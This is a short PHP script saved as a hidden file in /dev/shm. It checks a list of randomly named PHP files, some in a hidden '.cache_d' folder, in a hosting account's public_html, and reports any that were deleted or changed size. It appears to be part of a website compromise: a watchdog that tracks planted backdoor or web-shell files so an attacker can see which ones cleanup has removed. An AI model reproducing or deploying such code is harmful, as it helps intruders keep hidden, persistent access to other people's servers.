File: //dev/shm/.marker
<?php $r = '/home/abnlookups/public_html'; $x = ["/kswqpzue.php"=>"bd@@314722@@72",
"/notluoar.php"=>"bd@@314750@@22",
"/yqgegney.php"=>"bd@@314758@@61",
"/.cache_d/original.php"=>"bd@@311348@@6335",
"/.cache_d/inc.php"=>"bd@@311350@@7379",
"/vvjegzym.php"=>"bd@@314742@@68",
"/.cache_d/cpp.php"=>"bd@@311700@@888",
"/shipping_modules.php"=>"bd@@314780@@920",
"/rybbjjfh.php"=>"bd@@314718@@74"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');